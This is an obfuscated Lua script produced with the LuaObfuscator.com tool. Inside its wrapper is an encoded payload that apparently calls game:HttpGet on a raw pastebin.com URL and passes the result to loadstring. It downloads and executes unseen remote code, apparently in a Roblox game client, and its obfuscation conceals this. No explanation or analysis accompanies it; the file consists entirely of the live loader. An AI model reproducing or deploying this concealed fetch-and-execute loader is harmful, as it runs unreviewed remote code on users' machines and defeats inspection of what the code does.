--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (v0==5) then v16=nil;v16=function(v20,v21,...)local v27=1;local v28;v20=v5(v4(v20,5),"..",function(v29)if (v2(v29,2)==79) then v28=v1(v4(v29,1,1));return "";else local v78=0;local v79;while true do if (v78==0) then v79=v3(v1(v29,16));if v28 then local v115=0;local v116;while true do if (v115==0) then v116=v6(v79,v28);v28=nil;v115=1;end if (v115==1) then return v116;end end else return v79;end break;end end end end);local function v30(v31,v32,v33)if v33 then local v80=0;local v81;while true do if (v80==(0 + 0)) then v81=(v31/((3 -1)^(v32-(1440 -(934 + 505)))))%((981 -(719 + 260))^(((v33-(1759 -(1480 + 278))) -(v32-(1 -0))) + (646 -(328 + 317)))) ;return v81-(v81%((2 + 1) -2)) ;end end else local v82=0 + 0 ;local v83;while true do if (v82==(0 -(0 -0))) then v83=2^(v32-(2 -1)) ;return (((v31%(v83 + v83))>=v83) and (2 -1)) or (1540 -((1866 -(370 + 892)) + 646 + 290)) ;end end end end local function v34()local v47=v2(v20,v27,v27);v27=v27 + 1 ;return v47;end local function v35()local v48,v49=v2(v20,v27,v27 + (623 -(549 + 72)) );v27=v27 + (384 -(179 + 203)) ;return (v49 * 256) + v48 ;end local function v36()local v50=(0 -0) + 0 ;local v51;local v52;local v53;local v54;while true do if ((369 -(198 + 170))==v50) then return (v54 * (6114905 + 10662311)) + (v53 * 65536) + (v52 * ((1858 -(1106 + 73)) -(1212 -(506 + 283)))) + v51 ;end if (v50==0) then v51,v52,v53,v54=v2(v20,v27,v27 + 3 + 0 );v27=v27 + (620 -((1114 -(831 + 131)) + 464)) ;v50=540 -(496 + 43) ;end end end local function v37()local v55=184 -(59 + 125) ;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v55==((9 + 1) -7)) then if (v60==(0 + 0)) then if (v59==(0 -0)) then return v61 * (0 + 0) ;else local v117=821 -(598 + 223) ;while true do if (v117==(0 -0)) then v60=1 + 0 + 0 ;v58=1294 -(651 + 643) ;break;end end end elseif (v60==(3585 -(901 + 637))) then return ((v59==(0 -0)) and (v61 * ((2 -1)/(1395 -(736 + 659))))) or (v61 * NaN) ;end return v9(v61,v60-(1874 -(1280 -429)) ) * (v58 + (v59/((5 -3)^(120 -68)))) ;end if (v55==(334 -(264 + 68))) then v60=v30(v57,7 + (47 -33) ,46 -15 );v61=((v30(v57,23 + 4 + 5 )==(1671 -(1283 + 387))) and  -(1 + 0)) or (493 -(462 + 30)) ;v55=1 + 2 ;end if (v55==(1 + 0)) then v58=1 + 0 + 0 ;v59=(v30(v57,1,47 -27 ) * (((366 + 1234) -(422 + (1820 -644)))^(1405 -(713 + 660)))) + v56 ;v55=2;end if (v55==(0 + 0)) then v56=v36();v57=v36();v55=2 -(1 + 0) ;end end end local function v38(v39)local v62;if  not v39 then local v84=0;while true do if (v84==(0 + 0)) then v39=v36();if (v39==(0 + 0)) then return "";end break;end end end v62=v4(v20,v27,(v27 + v39) -(3 -2) );v27=v27 + v39 ;local v63={};for v76=2 -(1 + 0) , #v62 do v63[v76]=v3(v2(v4(v62,v76,v76)));end return v7(v63);end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v64=0;local v65;local v66;local v67;local v68;local v69;local v70;local v71;while true do if (v64~=(1 + 0)) then else local v85=0 + 0 ;while true do if (v85==(1 + 0)) then v64=1262 -(946 + 314) ;break;end if (v85==(357 -(16 + 341))) then v67=nil;v68=nil;v85=1 + 0 ;end end end if (0==v64) then local v86=1555 -(491 + 1064) ;local v87;while true do if (v86==0) then v87=0;while true do if (v87==(0 -0)) then local v122=0 + 0 ;while true do if (v122==(0 + 0)) then v65=0;v66=nil;v122=1;end if (v122~=(1 + 0)) then else v87=1;break;end end end if (v87==(1 + 0)) then v64=831 -(620 + 210) ;break;end end break;end end end if (v64~=2) then else local v88=0 -0 ;while true do if (v88~=(96 -(67 + 28))) then else v64=2 + 1 ;break;end if (v88~=(0 -0)) then else v69=nil;v70=nil;v88=1 -0 ;end end end if ((696 -(91 + 602))~=v64) then else v71=nil;while true do local v92=808 -(705 + 103) ;local v93;local v94;while true do if (v92==(0 -0)) then v93=0 -0 ;v94=nil;v92=3 -2 ;end if (v92~=(1 + 0)) then else while true do if (v93==(0 + 0)) then v94=0 + 0 ;while true do if (v94==1) then if (v65~=2) then else local v124=1729 -(794 + 935) ;while true do local v127=0 + 0 ;while true do if (0~=v127) then else if (v124==0) then for v153=1390 -(545 + 844) ,v36() do local v154=370 -(117 + 253) ;local v155;local v156;local v157;while true do if (v154~=(368 -(192 + 176))) then else v155=1244 -(313 + 931) ;v156=nil;v154=1 + 0 ;end if (v154==1) then v157=nil;while true do if (v155~=(2 -1)) then else while true do if (v156==0) then v157=v34();if (v30(v157,1 + 0 ,2 -1 )==0) then local v192=0;local v193;local v194;local v195;local v196;while true do if (v192~=(1399 -(1236 + 163))) then else local v203=0;local v204;while true do if ((0 -0)~=v203) then else v204=0 -0 ;while true do if (v204==(0 -0)) then local v217=0 -0 ;while true do if (v217==0) then v193=0 + 0 ;v194=nil;v217=1 -0 ;end if (v217==1) then v204=1 + 0 ;break;end end end if (v204==(2 -1)) then v192=729 -(15 + 713) ;break;end end break;end end end if (v192~=(1 + 0)) then else local v205=0 + 0 ;while true do if (v205==(0 + 0)) then v195=nil;v196=nil;v205=1115 -(1029 + 85) ;end if (v205==(1 + 0)) then v192=2 + 0 ;break;end end end if (v192==(852 -(101 + 749))) then while true do if (v193~=2) then else local v206=0 -0 ;local v207;local v208;while true do if (v206~=1) then else while true do if (v207~=(0 -0)) then else v208=0;while true do if (v208~=(764 -(528 + 235))) then else v193=1 + 2 ;break;end if (v208~=(880 -(539 + 341))) then else local v219=0;while true do if (v219==0) then if (v30(v195,1 + 0 ,1 + 0 )==(135 -(38 + 96))) then v196[7 -5 ]=v71[v196[2]];end if (v30(v195,1993 -(865 + 1126) ,3 -1 )~=1) then else v196[3]=v71[v196[1872 -(781 + 1088) ]];end v219=1 + 0 ;end if (v219~=(90 -(87 + 2))) then else v208=2 -1 ;break;end end end end break;end end break;end if (v206~=0) then else v207=767 -(146 + 621) ;v208=nil;v206=1 + 0 ;end end end if (v193~=(3 -2)) then else local v209=1867 -(20 + 1847) ;local v210;local v211;while true do if ((805 -(440 + 364))~=v209) then else while true do if (0==v210) then v211=0 -0 ;while true do if (0==v211) then local v220=0 + 0 ;while true do if (v220~=0) then else v196={v35(),v35(),nil,nil};if (v194==0) then local v225=0;local v226;local v227;local v228;while true do if (v225==(438 -(98 + 340))) then v226=0 + 0 ;v227=nil;v225=1;end if (v225==1) then v228=nil;while true do if ((1267 -(1040 + 226))==v226) then while true do if (v227==(853 -(163 + 690))) then v228=0 + 0 ;while true do if (v228==(1895 -(1062 + 833))) then v196[141 -(8 + 130) ]=v35();v196[4]=v35();break;end end break;end end break;end if (v226==(0 -0)) then v227=0 + 0 ;v228=nil;v226=1 + 0 ;end end break;end end elseif (v194==(2 -1)) then v196[3]=v36();elseif (v194==2) then v196[1 + 2 ]=v36() -(2^16) ;elseif (v194==(2 + 1)) then local v231=0;local v232;local v233;while true do if (v231~=(0 -0)) then else v232=490 -(442 + 48) ;v233=nil;v231=180 -(29 + 150) ;end if (v231~=1) then else while true do if (v232==(0 -0)) then v233=707 -(510 + 197) ;while true do if (v233~=(696 -(487 + 209))) then else v196[3 + 0 ]=v36() -((1 + 1)^(1131 -(12 + 1103))) ;v196[18 -14 ]=v35();break;end end break;end end break;end end end v220=1;end if (v220~=1) then else v211=1586 -(918 + 667) ;break;end end end if (v211~=(1 + 0)) then else v193=2;break;end end break;end end break;end if (v209~=0) then else v210=0 -0 ;v211=nil;v209=1 -0 ;end end end if (v193==(902 -(749 + 153))) then local v212=0 + 0 ;local v213;while true do if (v212~=(0 + 0)) then else v213=0 + 0 ;while true do if ((1 + 0)==v213) then v193=696 -(252 + 443) ;break;end if (v213==(228 -(67 + 161))) then local v218=0;while true do if (v218~=(1 -0)) then else v213=1821 -(1552 + 268) ;break;end if (v218~=(0 -0)) then else v194=v30(v157,2,1416 -(824 + 589) );v195=v30(v157,4,138 -(109 + 23) );v218=1 + 0 ;end end end end break;end end end if ((5 -2)==v193) then if (v30(v195,7 -4 ,8 -5 )==1) then v196[950 -(289 + 657) ]=v71[v196[1452 -(1398 + 50) ]];end v66[v153]=v196;break;end end break;end end end break;end end break;end if ((652 -(468 + 184))~=v155) then else v156=1323 -(530 + 793) ;v157=nil;v155=383 -(85 + 297) ;end end break;end end end for v158=1,v36() do v67[v158-(525 -(20 + 504)) ]=v42();end v124=390 -(249 + 140) ;end if (v124~=(1 + 0)) then else local v139=1339 -(428 + 911) ;local v140;while true do if (0~=v139) then else v140=0;while true do if ((801 -(775 + 26))==v140) then local v174=0 -0 ;while true do if ((0 + 0)~=v174) then else for v188=3 -2 ,v36() do v68[v188]=v36();end return v69;end end end end break;end end end break;end end end end break;end if (v94==(1810 -(99 + 1711))) then local v123=0;while true do if (v123~=(0 + 0)) then else if ((1 -0)~=v65) then else local v128=938 -(313 + 625) ;local v129;while true do if (v128~=(0 -0)) then else v129=0;while true do if (v129==(0 + 0)) then local v160=916 -(349 + 567) ;while true do if (v160~=(3 -2)) then else v129=1427 -(414 + 1012) ;break;end if (v160==(0 -0)) then v70=v36();v71={};v160=53 -(7 + 45) ;end end end if (v129==(1 -0)) then for v167=538 -(459 + 78) ,v70 do local v168=185 -(85 + 100) ;local v169;local v170;local v171;local v172;while true do if (v168~=(553 -(431 + 120))) then else while true do if (v169==(1 -0)) then v172=nil;while true do if (v170~=(363 -(322 + 40))) then else if (v171==(1 + 0)) then v172=v34()~=0 ;elseif (v171==(684 -(451 + 231))) then v172=v37();elseif (v171~=(4 -1)) then else v172=v38();end v71[v167]=v172;break;end if (v170~=(0 + 0)) then else local v198=0 -0 ;while true do if (v198~=(0 + 0)) then else v171=v34();v172=nil;v198=3 -2 ;end if ((1 + 0)==v198) then v170=2 -1 ;break;end end end end break;end if (v169==(0 + 0)) then local v190=0 -0 ;while true do if (v190==(1 + 0)) then v169=3 -2 ;break;end if (v190~=0) then else v170=0;v171=nil;v190=1 -0 ;end end end end break;end if ((0 + 0)~=v168) then else v169=1857 -(75 + 1782) ;v170=nil;v168=3 -2 ;end if (v168~=(1613 -(169 + 1443))) then else v171=nil;v172=nil;v168=1481 -(1028 + 451) ;end end end v69[514 -(399 + 112) ]=v34();v129=1 + 1 ;end if ((1478 -(1445 + 31))==v129) then v65=2;break;end end break;end end end if (v65~=(0 -0)) then else local v130=611 -(55 + 556) ;local v131;while true do if (v130~=0) then else v131=0;while true do if (v131~=0) then else local v162=0 -0 ;local v163;while true do if (v162==(0 + 0)) then v163=0;while true do if (0~=v163) then else v66={};v67={};v163=1273 -(828 + 444) ;end if ((3 -2)~=v163) then else v131=1216 -(144 + 1071) ;break;end end break;end end end if (v131==(2 -1)) then local v164=1445 -(1088 + 357) ;while true do if (1~=v164) then else v131=1369 -(732 + 635) ;break;end if (0~=v164) then else v68={};v69={v66,v67,nil,v68};v164=2 -1 ;end end end if ((1455 -(1009 + 444))~=v131) then else v65=1 + 0 ;break;end end break;end end end v123=1514 -(1354 + 159) ;end if (v123==(1 -0)) then v94=1 + 0 ;break;end end end end break;end end break;end end end break;end end end local function v43(v44,v45,v46)local v72=0;local v73;local v74;local v75;while true do if (0==v72) then v73=v44[1];v74=v44[2];v72=1;end if (v72==1) then v75=v44[3];return function(...)local v95=1;local v96= -1;local v97={...};local v98=v13("#",...) -1 ;local function v99()local v100=v73;local v101=v74;local v102=v75;local v103=v41;local v104={};local v105={};local v106={};for v110=0,v98 do if (((4479 -((795 -(298 + 252)) + 192))>3703) and (v110>=v102)) then v104[v110-v102 ]=v97[v110 + (1554 -(1016 + 537)) ];else v106[v110]=v97[v110 + 1 + 0 ];end end local v107=(v98-v102) + 1 ;local v108;local v109;while true do local v111=0 + 0 ;local v112;local v113;while true do if ((2841==(7640 -4799)) and (v111==(277 -((386 -298) + 188)))) then while true do if (((1842 + 365)<(37 + (3702 -(299 + 225)))) and (v112==(0 -(0 + 0)))) then v113=0 -0 ;while true do if ((v113==(1 -0)) or ((6691 -4052)<=(565 + 1434))) then if (((172 + 2662)>=((685 -(105 + 465)) + 169)) and (v109<=2)) then if ((51>(3 + 0 + 27)) and (v109<=(0 -0))) then local v132=0 -0 ;local v133;local v134;local v135;local v136;local v137;local v138;while true do if ((v132==1) or ((96 -49)>1791)) then v135=nil;v136=nil;v132=246 -(211 + 33) ;end if ((v132==3) or ((2619 -((1241 -861) + 202))>4457)) then while true do if (((5268 -2952)<=(4816 -(289 + 1496))) and (v133==(1 -(0 -0)))) then v136=nil;v137=nil;v133=1024 -(907 + 115) ;end if (((14381 -(39276 -29426))>=738) and (v133==(0 + 0))) then local v173=1535 -(577 + 958) ;while true do if (((2284 + 384)>=785) and ((1504 -(685 + 819))==v173)) then v134=0;v135=nil;v173=(297 -(203 + 93)) + 0 ;end if ((v173==(1 + 0)) or ((5976 -(1520 + 307))>(6084 -(2715 -1257)))) then v133=1983 -(1769 + 213) ;break;end end end if ((v133==(96 -((119 -50) + 25))) or (595==(2680 -(229 + 134 + 6)))) then v138=nil;while true do if (((880 + 467)<=(937 + 2187)) and (v134==((1599 -(1009 + 589)) + 0))) then local v182=0 -0 ;local v183;while true do if ((0==v182) or ((711 -(75 + 337))>(2016 -1057))) then v183=0 + 0 ;while true do if (((201 + (9996 -6121))<((13729 -8803) -(240 + 237))) and (v183==(495 -(221 + 274)))) then local v199=497 -(320 + 177) ;while true do if ((v199==(1552 -(1083 + 468))) or ((1723 -614)==525)) then v183=2 -1 ;break;end if (((4394 -(59 + 316))>(2031 -808)) and (v199==0)) then v96=(v137 + v135) -((6644 -5251) -(361 + 1031)) ;v138=(0 -0) + 0 ;v199=(2 -1) + 0 ;end end end if (((1901 -1290)==(2298 -1687)) and (v183==(1 + (0 -0)))) then v134=2;break;end end break;end end end if ((3029>1855) and (v134==(1973 -(1314 + 657)))) then for v185=v135,v96 do local v186=0;local v187;while true do if ((((4939 -2053) -(1284 + 396))<(3321 -(261 + 523))) and (v186==(150 -(59 + 91)))) then v187=0 + 0 ;while true do if ((v187==0) or ((1402 -(430 + 267))>=(7766 -4145))) then v138=v138 + (3 -2) ;v106[v185]=v136[v138];break;end end break;end end end break;end if (((1184 -(562 + 156 + 79))<=(2275 -(945 + 414))) and (v134==(0 + 0))) then local v184=(0 + 0) -0 ;while true do if ((v184==((1 -0) + 0)) or ((1515 -((2168 -1202) + 39))==(5568 -(982 + 133)))) then v134=108 -(70 + 37) ;break;end if (((18579 -13838)>((2304 -(601 + 655)) -(383 + 147))) and (v184==(0 -0))) then local v191=0 + 0 ;while true do if (((1 + 0)==v191) or ((2594 -(51 + 3))<(2205 -(274 + (261 -122))))) then v184=2 -1 ;break;end if (((1278 -939)==(437 -(93 + 5))) and (v191==(47 -(25 + 22)))) then v135=v108[2 + 0 ];v136,v137=v103(v106[v135](v14(v106,v135 + 1 ,v108[3])));v191=337 -(98 + 238) ;end end end end end end break;end end break;end if ((v132==(0 + 0)) or ((1977 -(6 + 175))>(4698 -(124 + (948 -(53 + 674)))))) then v133=0 + 0 + 0 ;v134=nil;v132=1;end if ((v132==((1524 -(731 + 792)) + 1)) or ((1889 -(3660 -2301))>=(1267 + 1226))) then v137=nil;v138=nil;v132=3 + 0 ;end end elseif ((v109==1) or ((1156 -750)>2146)) then local v141=0;local v142;local v143;while true do if ((v141==(894 -(267 + (2432 -1805)))) or (1843<=1354)) then v142=0 -0 ;v143=nil;v141=(351 + 1094) -(494 + 950) ;end if (((3 -(5 -3))==v141) or ((4456 -(301 + 1523))>4540)) then while true do if (((3700 -(754 + 4))<=(1894 + 1978)) and (0==v142)) then v143=v108[1082 -(685 + 395) ];v106[v143]=v106[v143](v14(v106,v143 + (3 -2) ,v96));break;end end break;end end else v106[v108[2]]=v108[1 + 2 ];end elseif ((v109<=(989 -(433 + 552))) or ((3396 + 858)<=(5576 -(643 + 1137)))) then if (((2313 -(508 + 66))==(909 + 830)) and (v109==(5 -2))) then v106[v108[2 + 0 ]]=v46[v108[8 -5 ]];else do return;end end elseif (((1283 -589)>=(425 -273)) and (v109==(9 -4))) then local v148=0 -0 ;local v149;local v150;local v151;while true do if ((v148==0) or ((4765 -(662 + 262))<=2270)) then v149=0;v150=nil;v148=712 -(151 + 560) ;end if ((v148==(710 -(20 + 689))) or ((5468 -2066)<(802 -(274 + 138)))) then v151=nil;while true do if ((803<=1666) and (v149==(0 -0))) then v150=v108[9 -7 ];v151=v106[v108[6 -(8 -5) ]];v149=(1 + 0) -(0 -0) ;end if ((2428>=(1793 -(19 + 9))) and (v149==(1 + 0 + 0))) then v106[v150 + 1 ]=v151;v106[v150]=v151[v108[2 + 2 ]];break;end end break;end end else v106[v108[2 + 0 ]]();end v95=v95 + (1 -0) ;break;end if ((0==v113) or (((40302 -26795) -9394)<=(5056 -(189 + 1224)))) then local v125=0;local v126;while true do if ((v125==(0 -0)) or (3631<(3227 -(7 + 52)))) then v126=0 + 0 ;while true do if (((1788 -(118 + 111))==(1911 -((566 -302) + (138 -50)))) and (v126==(1890 -(1677 + 212)))) then v113=1;break;end if (((3002 -(24 + (226 -145)))<(4169 -(128 + 52))) and (v126==0)) then local v152=1985 -(1848 + 137) ;while true do if ((v152==(149 -(30 + 118))) or ((188 + 1)>(11342 -7655))) then v126=1 + 0 ;break;end if (((1890 -(1631 + 259))==v152) or ((76 + 1912)<=(2540 -1072))) then v108=v100[v95];v109=v108[1 + 0 ];v152=1;end end end end break;end end end end break;end end break;end if (((12261 -8935)>=(2297 -1235)) and (v111==(0 -(0 + 0)))) then v112=303 -(130 + 173) ;v113=nil;v111=659 -(301 + 357) ;end end end end A,B=v41(v12(v99));if  not A[1] then local v114=v44[4][v95] or "?" ;error("Script error at ["   .. v114   .. "]:"   .. A[2] );else return v14(A,2,B);end end;end end end return v43(v42(),{},v21)(...);end;v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F39786A757654337200083O0012033O00013O001203000100023O002005000100010003001202000300046O000100034O00015O00022O00063O000100012O00043O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end end end
